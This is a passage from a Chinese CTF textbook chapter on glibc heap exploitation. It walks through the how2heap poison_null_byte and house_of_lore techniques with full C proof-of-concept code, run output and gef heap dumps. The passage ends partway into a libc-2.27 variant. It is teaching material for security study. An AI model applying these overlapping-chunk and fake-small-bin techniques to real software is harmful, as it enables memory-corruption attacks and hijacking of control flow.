# 3.1.7 Linux 堆利用(二) * [how2heap](#how2heap) * [poison\_null\_byte](#poison_null_byte) * [house\_of\_lore](#house_of_lore) * [overlapping\_chunks](#overlapping_chunks) * [overlapping\_chunks\_2](#overlapping_chunks_2) [下载文件](https://github.com/firmianay/CTF-All-In-One/blob/master/src/Others/3.1.6_heap_exploit) ## how2heap ### poison\_null\_byte ```c #include #include #include #include #include int main() { uint8_t *a, *b, *c, *b1, *b2, *d; a = (uint8_t*) malloc(0x10); int real_a_size = malloc_usable_size(a); fprintf(stderr, "We allocate 0x10 bytes for 'a': %p\n", a); fprintf(stderr, "'real' size of 'a': %#x\n", real_a_size); b = (uint8_t*) malloc(0x100); c = (uint8_t*) malloc(0x80); fprintf(stderr, "b: %p\n", b); fprintf(stderr, "c: %p\n", c); uint64_t* b_size_ptr = (uint64_t*)(b - 0x8); *(size_t*)(b+0xf0) = 0x100; fprintf(stderr, "b.size: %#lx ((0x100 + 0x10) | prev_in_use)\n\n", *b_size_ptr); // deal with tcache // int *k[10], i; // for (i = 0; i < 7; i++) { // k[i] = malloc(0x100); // } // for (i = 0; i < 7; i++) { // free(k[i]); // } free(b); uint64_t* c_prev_size_ptr = ((uint64_t*)c) - 2; fprintf(stderr, "After free(b), c.prev_size: %#lx\n", *c_prev_size_ptr); a[real_a_size] = 0; // <--- THIS IS THE "EXPLOITED BUG" fprintf(stderr, "We overflow 'a' with a single null byte into the metadata of 'b'\n"); fprintf(stderr, "b.size: %#lx\n\n", *b_size_ptr); fprintf(stderr, "Pass the check: chunksize(P) == %#lx == %#lx == prev_size (next_chunk(P))\n", *((size_t*)(b-0x8)), *(size_t*)(b-0x10 + *((size_t*)(b-0x8)))); b1 = malloc(0x80); memset(b1, 'A', 0x80); fprintf(stderr, "We malloc 'b1': %p\n", b1); fprintf(stderr, "c.prev_size: %#lx\n", *c_prev_size_ptr); fprintf(stderr, "fake c.prev_size: %#lx\n\n", *(((uint64_t*)c)-4)); b2 = malloc(0x40); memset(b2, 'A', 0x40); fprintf(stderr, "We malloc 'b2', our 'victim' chunk: %p\n", b2); // deal with tcache // for (i = 0; i < 7; i++) { // k[i] = malloc(0x80); // } // for (i = 0; i < 7; i++) { // free(k[i]); // } free(b1); free(c); fprintf(stderr, "Now we free 'b1' and 'c', this will consolidate the chunks 'b1' and 'c' (forgetting about 'b2').\n"); d = malloc(0x110); fprintf(stderr, "Finally, we allocate 'd', overlapping 'b2': %p\n\n", d); fprintf(stderr, "b2 content:%s\n", b2); memset(d, 'B', 0xb0); fprintf(stderr, "New b2 content:%s\n", b2); } ``` ``` $ gcc -g poison_null_byte.c $ ./a.out We allocate 0x10 bytes for 'a': 0xabb010 'real' size of 'a': 0x18 b: 0xabb030 c: 0xabb140 b.size: 0x111 ((0x100 + 0x10) | prev_in_use) After free(b), c.prev_size: 0x110 We overflow 'a' with a single null byte into the metadata of 'b' b.size: 0x100 Pass the check: chunksize(P) == 0x100 == 0x100 == prev_size (next_chunk(P)) We malloc 'b1': 0xabb030 c.prev_size: 0x110 fake c.prev_size: 0x70 We malloc 'b2', our 'victim' chunk: 0xabb0c0 Now we free 'b1' and 'c', this will consolidate the chunks 'b1' and 'c' (forgetting about 'b2'). Finally, we allocate 'd', overlapping 'b2': 0xabb030 b2 content:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA New b2 content:BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ``` 该技术适用的场景需要某个 malloc 的内存区域存在一个单字节溢出漏洞。通过溢出下一个 chunk 的 size 字段,攻击者能够在堆中创造出重叠的内存块,从而达到改写其他数据的目的。再结合其他的利用方式,同样能够获得程序的控制权。 对于单字节溢出的利用有下面几种: * 扩展被释放块:当溢出块的下一块为被释放块且处于 unsorted bin 中,则通过溢出一个字节来将其大小扩大,下次取得次块时就意味着其后的块将被覆盖而造成进一步的溢出 ``` 0x100 0x100 0x80 |-------|-------|-------| | A | B | C | 初始状态 |-------|-------|-------| | A | B | C | 释放 B |-------|-------|-------| | A | B | C | 溢出 B 的 size 为 0x180 |-------|-------|-------| | A | B | C | malloc(0x180-8) |-------|-------|-------| C 块被覆盖 |<--实际得到的块->| ``` * 扩展已分配块:当溢出块的下一块为使用中的块,则需要合理控制溢出的字节,使其被释放时的合并操作能够顺利进行,例如直接加上下一块的大小使其完全被覆盖。下一次分配对应大小时,即可取得已经被扩大的块,并造成进一步溢出 ``` 0x100 0x100 0x80 |-------|-------|-------| | A | B | C | 初始状态 |-------|-------|-------| | A | B | C | 溢出 B 的 size 为 0x180 |-------|-------|-------| | A | B | C | 释放 B |-------|-------|-------| | A | B | C | malloc(0x180-8) |-------|-------|-------| C 块被覆盖 |<--实际得到的块->| ``` * 收缩被释放块:此情况针对溢出的字节只能为 0 的时候,也就是本节所说的 poison-null-byte,此时将下一个被释放的块大小缩小,如此一来在之后分裂此块时将无法正确更新后一块的 prev\_size 字段,导致释放时出现重叠的堆块 ``` 0x100 0x210 0x80 |-------|---------------|-------| | A | B | C | 初始状态 |-------|---------------|-------| | A | B | C | 释放 B |-------|---------------|-------| | A | B | C | 溢出 B 的 size 为 0x200 |-------|---------------|-------| 之后的 malloc 操作没有更新 C 的 prev_size 0x100 0x80 |-------|------|-----|--|-------| | A | B1 | B2 | | C | malloc(0x180-8), malloc(0x80-8) |-------|------|-----|--|-------| | A | B1 | B2 | | C | 释放 B1 |-------|------|-----|--|-------| | A | B1 | B2 | | C | 释放 C,C 将与 B1 合并 |-------|------|-----|--|-------| | A | B1 | B2 | | C | malloc(0x180-8) |-------|------|-----|--|-------| B2 将被覆盖 |<实际得到的块>| ``` * house of einherjar:也是溢出字节只能为 0 的情况,当它是更新溢出块下一块的 prev\_size 字段,使其在被释放时能够找到之前一个合法的被释放块并与其合并,造成堆块重叠 ``` 0x100 0x100 0x101 |-------|-------|-------| | A | B | C | 初始状态 |-------|-------|-------| | A | B | C | 释放 A |-------|-------|-------| | A | B | C | 溢出 B,覆盖 C 块的 size 为 0x200,并使其 prev_size 为 0x200 |-------|-------|-------| | A | B | C | 释放 C |-------|-------|-------| | A | B | C | C 将与 A 合并 |-------|-------|-------| B 块被重叠 |<-----实际得到的块------>| ``` 首先分配三个 chunk,第一个 chunk 类型无所谓,但后两个不能是 fast chunk,因为 fast chunk 在释放后不会被合并。这里 chunk a 用于制造单字节溢出,去覆盖 chunk b 的第一个字节,chunk c 的作用是帮助伪造 fake chunk。 首先是溢出,那么就需要知道一个堆块实际可用的内存大小(因为空间复用,可能会比分配时要大一点),用于获得该大小的函数 `malloc_usable_size` 如下: ```c /* ------------------------- malloc_usable_size ------------------------- */ static size_t musable (void *mem) { mchunkptr p; if (mem != 0) { p = mem2chunk (mem); [...] if (chunk_is_mmapped (p)) return chunksize (p) - 2 * SIZE_SZ; else if (inuse (p)) return chunksize (p) - SIZE_SZ; } return 0; } ``` ```c /* check for mmap()'ed chunk */ #define chunk_is_mmapped(p) ((p)->size & IS_MMAPPED) /* extract p's inuse bit */ #define inuse(p) \ ((((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))->size) & PREV_INUSE) /* Get size, ignoring use bits */ #define chunksize(p) ((p)->size & ~(SIZE_BITS)) ``` 所以 `real_a_size = chunksize(a) - 0x8 == 0x18`。另外需要注意的是程序是通过 next chunk 的 `PREV_INUSE` 标志来判断某 chunk 是否被使用的。 为了在修改 chunk b 的 size 字段后,依然能通过 unlink 的检查,我们需要伪造一个 c.prev\_size 字段,字段的大小是很好计算的,即 `0x100 == (0x111 & 0xff00)`,正好是 NULL 字节溢出后的值。然后把 chunk b 释放掉,chunk b 随后被放到 unsorted bin 中,大小是 0x110。此时的堆布局如下: ``` gef➤ x/42gx a-0x10 0x603000: 0x0000000000000000 0x0000000000000021 <-- chunk a 0x603010: 0x0000000000000000 0x0000000000000000 0x603020: 0x0000000000000000 0x0000000000000111 <-- chunk b [be freed] 0x603030: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer 0x603040: 0x0000000000000000 0x0000000000000000 0x603050: 0x0000000000000000 0x0000000000000000 0x603060: 0x0000000000000000 0x0000000000000000 0x603070: 0x0000000000000000 0x0000000000000000 0x603080: 0x0000000000000000 0x0000000000000000 0x603090: 0x0000000000000000 0x0000000000000000 0x6030a0: 0x0000000000000000 0x0000000000000000 0x6030b0: 0x0000000000000000 0x0000000000000000 0x6030c0: 0x0000000000000000 0x0000000000000000 0x6030d0: 0x0000000000000000 0x0000000000000000 0x6030e0: 0x0000000000000000 0x0000000000000000 0x6030f0: 0x0000000000000000 0x0000000000000000 0x603100: 0x0000000000000000 0x0000000000000000 0x603110: 0x0000000000000000 0x0000000000000000 0x603120: 0x0000000000000100 0x0000000000000000 <-- fake c.prev_size 0x603130: 0x0000000000000110 0x0000000000000090 <-- chunk c 0x603140: 0x0000000000000000 0x0000000000000000 gef➤ heap bins unsorted [ Unsorted Bin for arena 'main_arena' ] [+] unsorted_bins[0]: fw=0x603020, bk=0x603020 → Chunk(addr=0x603030, size=0x110, flags=PREV_INUSE) ``` 最关键的一步,通过溢出漏洞覆写 chunk b 的数据: ``` gef➤ x/42gx a-0x10 0x603000: 0x0000000000000000 0x0000000000000021 <-- chunk a 0x603010: 0x0000000000000000 0x0000000000000000 0x603020: 0x0000000000000000 0x0000000000000100 <-- chunk b [be freed] 0x603030: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer 0x603040: 0x0000000000000000 0x0000000000000000 0x603050: 0x0000000000000000 0x0000000000000000 0x603060: 0x0000000000000000 0x0000000000000000 0x603070: 0x0000000000000000 0x0000000000000000 0x603080: 0x0000000000000000 0x0000000000000000 0x603090: 0x0000000000000000 0x0000000000000000 0x6030a0: 0x0000000000000000 0x0000000000000000 0x6030b0: 0x0000000000000000 0x0000000000000000 0x6030c0: 0x0000000000000000 0x0000000000000000 0x6030d0: 0x0000000000000000 0x0000000000000000 0x6030e0: 0x0000000000000000 0x0000000000000000 0x6030f0: 0x0000000000000000 0x0000000000000000 0x603100: 0x0000000000000000 0x0000000000000000 0x603110: 0x0000000000000000 0x0000000000000000 0x603120: 0x0000000000000100 0x0000000000000000 <-- fake c.prev_size 0x603130: 0x0000000000000110 0x0000000000000090 <-- chunk c 0x603140: 0x0000000000000000 0x0000000000000000 gef➤ heap bins unsorted [ Unsorted Bin for arena 'main_arena' ] [+] unsorted_bins[0]: fw=0x603020, bk=0x603020 → Chunk(addr=0x603030, size=0x100, flags=) ``` 这时,根据我们上一篇文字中讲到的计算方法: * `chunksize(P) == *((size_t*)(b-0x8)) & (~ 0x7) == 0x100` * `prev_size (next_chunk(P)) == *(size_t*)(b-0x10 + 0x100) == 0x100` 可以成功绕过检查。另外 unsorted bin 中的 chunk 大小也变成了 0x100。 接下来随意分配两个 chunk,malloc 会从 unsorted bin 中划出合适大小的内存返回给用户: ``` gef➤ x/42gx a-0x10 0x603000: 0x0000000000000000 0x0000000000000021 <-- chunk a 0x603010: 0x0000000000000000 0x0000000000000000 0x603020: 0x0000000000000000 0x0000000000000091 <-- chunk b1 <-- fake chunk b 0x603030: 0x4141414141414141 0x4141414141414141 0x603040: 0x4141414141414141 0x4141414141414141 0x603050: 0x4141414141414141 0x4141414141414141 0x603060: 0x4141414141414141 0x4141414141414141 0x603070: 0x4141414141414141 0x4141414141414141 0x603080: 0x4141414141414141 0x4141414141414141 0x603090: 0x4141414141414141 0x4141414141414141 0x6030a0: 0x4141414141414141 0x4141414141414141 0x6030b0: 0x0000000000000000 0x0000000000000051 <-- chunk b2 <-- 'victim' chunk 0x6030c0: 0x4141414141414141 0x4141414141414141 0x6030d0: 0x4141414141414141 0x4141414141414141 0x6030e0: 0x4141414141414141 0x4141414141414141 0x6030f0: 0x4141414141414141 0x4141414141414141 0x603100: 0x0000000000000000 0x0000000000000021 <-- unsorted bin 0x603110: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer 0x603120: 0x0000000000000020 0x0000000000000000 <-- fake c.prev_size 0x603130: 0x0000000000000110 0x0000000000000090 <-- chunk c 0x603140: 0x0000000000000000 0x0000000000000000 gef➤ heap bins unsorted [ Unsorted Bin for arena 'main_arena' ] [+] unsorted_bins[0]: fw=0x603100, bk=0x603100 → Chunk(addr=0x603110, size=0x20, flags=PREV_INUSE) ``` 这里有个很有趣的东西,分配堆块后,发生变化的是 fake c.prev\_size,而不是 c.prev\_size。所以 chunk c 依然认为 chunk b 的地方有一个大小为 0x110 的 free chunk。但其实这片内存已经被分配给了 chunk b1。 接下来是见证奇迹的时刻,我们知道,两个相邻的 small chunk 被释放后会被合并在一起。首先释放 chunk b1,伪造出 fake chunk b 是 free chunk 的样子。然后释放 chunk c,这时程序会发现 chunk c 的前一个 chunk 是一个 free chunk,然后就将它们合并在了一起,并从 unsorted bin 中取出来合并进了 top chunk。可怜的 chunk 2 位于 chunk b1 和 chunk c 之间,被直接无视了,现在 malloc 认为这整块区域都是未分配的,新的 top chunk 指针已经说明了一切。 ``` gef➤ x/42gx a-0x10 0x603000: 0x0000000000000000 0x0000000000000021 <-- chunk a 0x603010: 0x0000000000000000 0x0000000000000000 0x603020: 0x0000000000000000 0x0000000000020fe1 <-- top chunk 0x603030: 0x0000000000603100 0x00007ffff7dd1b78 0x603040: 0x4141414141414141 0x4141414141414141 0x603050: 0x4141414141414141 0x4141414141414141 0x603060: 0x4141414141414141 0x4141414141414141 0x603070: 0x4141414141414141 0x4141414141414141 0x603080: 0x4141414141414141 0x4141414141414141 0x603090: 0x4141414141414141 0x4141414141414141 0x6030a0: 0x4141414141414141 0x4141414141414141 0x6030b0: 0x0000000000000090 0x0000000000000050 <-- chunk b2 <-- 'victim' chunk 0x6030c0: 0x4141414141414141 0x4141414141414141 0x6030d0: 0x4141414141414141 0x4141414141414141 0x6030e0: 0x4141414141414141 0x4141414141414141 0x6030f0: 0x4141414141414141 0x4141414141414141 0x603100: 0x0000000000000000 0x0000000000000021 <-- unsorted bin 0x603110: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer 0x603120: 0x0000000000000020 0x0000000000000000 0x603130: 0x0000000000000110 0x0000000000000090 0x603140: 0x0000000000000000 0x0000000000000000 gef➤ heap bins unsorted [ Unsorted Bin for arena 'main_arena' ] [+] unsorted_bins[0]: fw=0x603100, bk=0x603100 → Chunk(addr=0x603110, size=0x20, flags=PREV_INUSE) ``` chunk 合并的过程如下,首先该 chunk 与前一个 chunk 合并,然后检查下一个 chunk 是否为 top chunk,如果不是,将合并后的 chunk 放回 unsorted bin 中,否则,合并进 top chunk: ```c /* consolidate backward */ if (!prev_inuse(p)) { prevsize = p->prev_size; size += prevsize; p = chunk_at_offset(p, -((long) prevsize)); unlink(av, p, bck, fwd); } if (nextchunk != av->top) { /* Place the chunk in unsorted chunk list. Chunks are not placed into regular bins until after they have been given one chance to be used in malloc. */ [...] } /* If the chunk borders the current high end of memory, consolidate into top */ else { size += nextsize; set_head(p, size | PREV_INUSE); av->top = p; check_chunk(av, p); } ``` 接下来,申请一块大空间,大到可以把 chunk b2 包含进来,这样 chunk b2 就完全被我们控制了。 ``` gef➤ x/42gx a-0x10 0x603000: 0x0000000000000000 0x0000000000000021 <-- chunk a 0x603010: 0x0000000000000000 0x0000000000000000 0x603020: 0x0000000000000000 0x0000000000000121 <-- chunk d 0x603030: 0x4242424242424242 0x4242424242424242 0x603040: 0x4242424242424242 0x4242424242424242 0x603050: 0x4242424242424242 0x4242424242424242 0x603060: 0x4242424242424242 0x4242424242424242 0x603070: 0x4242424242424242 0x4242424242424242 0x603080: 0x4242424242424242 0x4242424242424242 0x603090: 0x4242424242424242 0x4242424242424242 0x6030a0: 0x4242424242424242 0x4242424242424242 0x6030b0: 0x4242424242424242 0x4242424242424242 <-- chunk b2 <-- 'victim' chunk 0x6030c0: 0x4242424242424242 0x4242424242424242 0x6030d0: 0x4242424242424242 0x4242424242424242 0x6030e0: 0x4141414141414141 0x4141414141414141 0x6030f0: 0x4141414141414141 0x4141414141414141 0x603100: 0x0000000000000000 0x0000000000000021 <-- small bins 0x603110: 0x00007ffff7dd1b88 0x00007ffff7dd1b88 <-- fd, bk pointer 0x603120: 0x0000000000000020 0x0000000000000000 0x603130: 0x0000000000000110 0x0000000000000090 0x603140: 0x0000000000000000 0x0000000000020ec1 <-- top chunk gef➤ heap bins small [ Small Bins for arena 'main_arena' ] [+] small_bins[1]: fw=0x603100, bk=0x603100 → Chunk(addr=0x603110, size=0x20, flags=PREV_INUSE) ``` 还有个事情值得注意,在分配 chunk d 时,由于在 unsorted bin 中没有找到适合的 chunk,malloc 就将 unsorted bin 中的 chunk 都整理回各自的 bins 中了,这里就是 small bins。 最后,继续看 libc-2.26 上的情况,还是一样的,处理好 tchache 就可以了,把两种大小的 tcache bin 都占满。 heap-buffer-overflow,但不知道为什么,加了内存检测参数后,real size 只能是正常的 0x10 了。 ``` $ gcc -fsanitize=address -g poison_null_byte.c $ ./a.out We allocate 0x10 bytes for 'a': 0x60200000eff0 'real' size of 'a': 0x10 b: 0x611000009f00 c: 0x60c00000bf80 ================================================================= ==2369==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000009ef8 at pc 0x000000400be0 bp 0x7ffe7826e9a0 sp 0x7ffe7826e990 READ of size 8 at 0x611000009ef8 thread T0 #0 0x400bdf in main /home/firmy/how2heap/poison_null_byte.c:22 #1 0x7f47d8fe382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #2 0x400978 in _start (/home/firmy/how2heap/a.out+0x400978) 0x611000009ef8 is located 8 bytes to the left of 256-byte region [0x611000009f00,0x61100000a000) allocated by thread T0 here: #0 0x7f47d9425602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x400af1 in main /home/firmy/how2heap/poison_null_byte.c:15 #2 0x7f47d8fe382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) ``` ### house\_of\_lore ```c #include #include #include #include void jackpot(){ puts("Nice jump d00d"); exit(0); } int main() { intptr_t *victim = malloc(0x80); memset(victim, 'A', 0x80); void *p5 = malloc(0x10); memset(p5, 'A', 0x10); intptr_t *victim_chunk = victim - 2; fprintf(stderr, "Allocated the victim (small) chunk: %p\n", victim); intptr_t* stack_buffer_1[4] = {0}; intptr_t* stack_buffer_2[3] = {0}; stack_buffer_1[0] = 0; stack_buffer_1[2] = victim_chunk; stack_buffer_1[3] = (intptr_t*)stack_buffer_2; stack_buffer_2[2] = (intptr_t*)stack_buffer_1; fprintf(stderr, "stack_buffer_1: %p\n", (void*)stack_buffer_1); fprintf(stderr, "stack_buffer_2: %p\n\n", (void*)stack_buffer_2); free((void*)victim); fprintf(stderr, "Freeing the victim chunk %p, it will be inserted in the unsorted bin\n", victim); fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]); fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]); void *p2 = malloc(0x100); fprintf(stderr, "Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: %p\n", p2); fprintf(stderr, "The victim chunk %p will be inserted in front of the SmallBin\n", victim); fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]); fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]); victim[1] = (intptr_t)stack_buffer_1; fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n"); void *p3 = malloc(0x40); char *p4 = malloc(0x80); memset(p4, 'A', 0x10); fprintf(stderr, "This last malloc should return a chunk at the position injected in bin->bk: %p\n", p4); fprintf(stderr, "The fd pointer of stack_buffer_2 has changed: %p\n\n", stack_buffer_2[2]); intptr_t sc = (intptr_t)jackpot; memcpy((p4+40), &sc, 8); } ``` ``` $ gcc -g house_of_lore.c $ ./a.out Allocated the victim (small) chunk: 0x1b2e010 stack_buffer_1: 0x7ffe5c570350 stack_buffer_2: 0x7ffe5c570330 Freeing the victim chunk 0x1b2e010, it will be inserted in the unsorted bin victim->fd: 0x7f239d4c9b78 victim->bk: 0x7f239d4c9b78 Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: 0x1b2e0c0 The victim chunk 0x1b2e010 will be inserted in front of the SmallBin victim->fd: 0x7f239d4c9bf8 victim->bk: 0x7f239d4c9bf8 Now emulating a vulnerability that can overwrite the victim->bk pointer This last malloc should return a chunk at the position injected in bin->bk: 0x7ffe5c570360 The fd pointer of stack_buffer_2 has changed: 0x7f239d4c9bf8 Nice jump d00d ``` 在前面的技术中,我们已经知道怎样去伪造一个 fake chunk,接下来,我们要尝试伪造一条 small bins 链。 首先创建两个 chunk,第一个是我们的 victim chunk,请确保它是一个 small chunk,第二个随意,只是为了确保在 free 时 victim chunk 不会被合并进 top chunk 里。然后,在栈上伪造两个 fake chunk,让 fake chunk 1 的 fd 指向 victim chunk,bk 指向 fake chunk 2;fake chunk 2 的 fd 指向 fake chunk 1,这样一个 small bin 链就差不多了: ``` gef➤ x/26gx victim-2 0x603000: 0x0000000000000000 0x0000000000000091 <-- victim chunk 0x603010: 0x4141414141414141 0x4141414141414141 0x603020: 0x4141414141414141 0x4141414141414141 0x603030: 0x4141414141414141 0x4141414141414141 0x603040: 0x4141414141414141 0x4141414141414141 0x603050: 0x4141414141414141 0x4141414141414141 0x603060: 0x4141414141414141 0x4141414141414141 0x603070: 0x4141414141414141 0x4141414141414141 0x603080: 0x4141414141414141 0x4141414141414141 0x603090: 0x0000000000000000 0x0000000000000021 <-- chunk p5 0x6030a0: 0x4141414141414141 0x4141414141414141 0x6030b0: 0x0000000000000000 0x0000000000020f51 <-- top chunk 0x6030c0: 0x0000000000000000 0x0000000000000000 gef➤ x/10gx &stack_buffer_2 0x7fffffffdc30: 0x0000000000000000 0x0000000000000000 <-- fake chunk 2 0x7fffffffdc40: 0x00007fffffffdc50 0x0000000000400aed <-- fd->fake chunk 1 0x7fffffffdc50: 0x0000000000000000 0x0000000000000000 <-- fake chunk 1 0x7fffffffdc60: 0x0000000000603000 0x00007fffffffdc30 <-- fd->victim chunk, bk->fake chunk 2 0x7fffffffdc70: 0x00007fffffffdd60 0x7c008088c400bc00 ``` molloc 中对于 small bin 链表的检查是这样的: ```c [...] else { bck = victim->bk; if (__glibc_unlikely (bck->fd != victim)) { errstr = "malloc(): smallbin double linked list corrupted"; goto errout; } set_inuse_bit_at_offset (victim, nb); bin->bk = bck; bck->fd = bin; [...] ``` 即检查 bin 中第二块的 bk 指针是否指向第一块,来发现对 small bins 的破坏。为了绕过这个检查,所以才需要同时伪造 bin 中的前 2 个 chunk。 接下来释放掉 victim chunk,它会被放到 unsoted bin 中,且 fd/bk 均指向 unsorted bin 的头部: ``` gef➤ x/26gx victim-2 0x603000: 0x0000000000000000 0x0000000000000091 <-- victim chunk [be freed] 0x603010: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer 0x603020: 0x4141414141414141 0x4141414141414141 0x603030: 0x4141414141414141 0x4141414141414141 0x603040: 0x4141414141414141 0x4141414141414141 0x603050: 0x4141414141414141 0x4141414141414141 0x603060: 0x4141414141414141 0x4141414141414141 0x603070: 0x4141414141414141 0x4141414141414141 0x603080: 0x4141414141414141 0x4141414141414141 0x603090: 0x0000000000000090 0x0000000000000020 <-- chunk p5 0x6030a0: 0x4141414141414141 0x4141414141414141 0x6030b0: 0x0000000000000000 0x0000000000020f51 <-- top chunk 0x6030c0: 0x0000000000000000 0x0000000000000000 gef➤ heap bins unsorted [ Unsorted Bin for arena 'main_arena' ] [+] unsorted_bins[0]: fw=0x603000, bk=0x603000 → Chunk(addr=0x603010, size=0x90, flags=PREV_INUSE) ``` 这时,申请一块大的 chunk,只需要大到让 malloc 在 unsorted bin 中找不到合适的就可以了。这样原本在 unsorted bin 中的 chunk,会被整理回各自的所属的 bins 中,这里就是 small bins: ``` gef➤ heap bins small [ Small Bins for arena 'main_arena' ] [+] small_bins[8]: fw=0x603000, bk=0x603000 → Chunk(addr=0x603010, size=0x90, flags=PREV_INUSE) ``` 接下来是最关键的一步,假设存在一个漏洞,可以让我们修改 victim chunk 的 bk 指针。那么就修改 bk 让它指向我们在栈上布置的 fake small bin: ``` gef➤ x/26gx victim-2 0x603000: 0x0000000000000000 0x0000000000000091 <-- victim chunk [be freed] 0x603010: 0x00007ffff7dd1bf8 0x00007fffffffdc50 <-- bk->fake chunk 1 0x603020: 0x4141414141414141 0x4141414141414141 0x603030: 0x4141414141414141 0x4141414141414141 0x603040: 0x4141414141414141 0x4141414141414141 0x603050: 0x4141414141414141 0x4141414141414141 0x603060: 0x4141414141414141 0x4141414141414141 0x603070: 0x4141414141414141 0x4141414141414141 0x603080: 0x4141414141414141 0x4141414141414141 0x603090: 0x0000000000000090 0x0000000000000020 <-- chunk p5 0x6030a0: 0x4141414141414141 0x4141414141414141 0x6030b0: 0x0000000000000000 0x0000000000000111 <-- chunk p2 0x6030c0: 0x0000000000000000 0x0000000000000000 gef➤ x/10gx &stack_buffer_2 0x7fffffffdc30: 0x0000000000000000 0x0000000000000000 <-- fake chunk 2 0x7fffffffdc40: 0x00007fffffffdc50 0x0000000000400aed <-- fd->fake chunk 1 0x7fffffffdc50: 0x0000000000000000 0x0000000000000000 <-- fake chunk 1 0x7fffffffdc60: 0x0000000000603000 0x00007fffffffdc30 <-- fd->victim chunk, bk->fake chunk 2 0x7fffffffdc70: 0x00007fffffffdd60 0x7c008088c400bc00 ``` 我们知道 small bins 是先进先出的,节点的增加发生在链表头部,而删除发生在尾部。这时整条链是这样的: ``` HEAD(undefined) <-> fake chunk 2 <-> fake chunk 1 <-> victim chunk <-> TAIL fd: -> bk: <- ``` fake chunk 2 的 bk 指向了一个未定义的地址,如果能通过内存泄露等手段,拿到 HEAD 的地址并填进去,整条链就闭合了。当然这里完全没有必要这么做。 接下来的第一个 malloc,会返回 victim chunk 的地址,如果 malloc 的大小正好等于 victim chunk 的大小,那么情况会简单一点。但是这里我们不这样做,malloc 一个小一点的地址,可以看到,malloc 从 small bin 里取出了末尾的 victim chunk,切了一块返回给 chunk p3,然后把剩下的部分放回到了 unsorted bin。同时 small bin 变成了这样: ``` HEAD(undefined) <-> fake chunk 2 <-> fake chunk 1 <-> TAIL ``` ``` gef➤ x/26gx victim-2 0x603000: 0x0000000000000000 0x0000000000000051 <-- chunk p3 0x603010: 0x00007ffff7dd1bf8 0x00007fffffffdc50 0x603020: 0x4141414141414141 0x4141414141414141 0x603030: 0x4141414141414141 0x4141414141414141 0x603040: 0x4141414141414141 0x4141414141414141 0x603050: 0x4141414141414141 0x0000000000000041 <-- unsorted bin 0x603060: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer 0x603070: 0x4141414141414141 0x4141414141414141 0x603080: 0x4141414141414141 0x4141414141414141 0x603090: 0x0000000000000040 0x0000000000000020 <-- chunk p5 0x6030a0: 0x4141414141414141 0x4141414141414141 0x6030b0: 0x0000000000000000 0x0000000000000111 <-- chunk p2 0x6030c0: 0x0000000000000000 0x0000000000000000 gef➤ x/10gx &stack_buffer_2 0x7fffffffdc30: 0x0000000000000000 0x0000000000000000 <-- fake chunk 2 0x7fffffffdc40: 0x00007fffffffdc50 0x0000000000400aed <-- fd->fake chunk 1 0x7fffffffdc50: 0x0000000000000000 0x0000000000000000 <-- fake chunk 1 0x7fffffffdc60: 0x00007ffff7dd1bf8 0x00007fffffffdc30 <-- fd->TAIL, bk->fake chunk 2 0x7fffffffdc70: 0x00007fffffffdd60 0x7c008088c400bc00 gef➤ heap bins unsorted [ Unsorted Bin for arena 'main_arena' ] [+] unsorted_bins[0]: fw=0x603050, bk=0x603050 → Chunk(addr=0x603060, size=0x40, flags=PREV_INUSE) ``` 最后,再次 malloc 将返回 fake chunk 1 的地址,地址在栈上且我们能够控制。同时 small bin 变成这样: ``` HEAD(undefined) <-> fake chunk 2 <-> TAIL ``` ``` gef➤ x/10gx &stack_buffer_2 0x7fffffffdc30: 0x0000000000000000 0x0000000000000000 <-- fake chunk 2 0x7fffffffdc40: 0x00007ffff7dd1bf8 0x0000000000400aed <-- fd->TAIL 0x7fffffffdc50: 0x0000000000000000 0x0000000000000000 <-- chunk 4 0x7fffffffdc60: 0x4141414141414141 0x4141414141414141 0x7fffffffdc70: 0x00007fffffffdd60 0x7c008088c400bc00 ``` 于是我们就成功地骗过了 malloc 在栈上分配了一个 chunk。 最后再想一下,其实最初的 victim chunk 使用 fast chunk 也是可以的,其释放后虽然是被加入到 fast bins 中,而不是 unsorted bin,但 malloc 之后,也会被整理到 small bins 里。自行尝试吧。 heap-use-after-free,所以上面我们用于修改 bk 指针的漏洞,应该就是一个 UAF 吧,当然溢出也是可以的: ``` $ gcc -fsanitize=address -g house_of_lore.c $ ./a.out Allocated the victim (small) chunk: 0x60c00000bf80 stack_buffer_1: 0x7ffd1fbc5cd0 stack_buffer_2: 0x7ffd1fbc5c90 Freeing the victim chunk 0x60c00000bf80, it will be inserted in the unsorted bin ================================================================= ==6034==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c00000bf80 at pc 0x000000400eec bp 0x7ffd1fbc5bf0 sp 0x7ffd1fbc5be0 READ of size 8 at 0x60c00000bf80 thread T0 #0 0x400eeb in main /home/firmy/how2heap/house_of_lore.c:27 #1 0x7febee33c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #2 0x400b38 in _start (/home/firmy/how2heap/a.out+0x400b38) ``` 最后再给一个 libc-2.27 版本的: ```c #include #include #include #include void jackpot(){ puts("Nice jump d00d"); exit(0); } int main() { intptr_t *victim = malloc(0x80); // fill the tcache int *a[10]; int i; 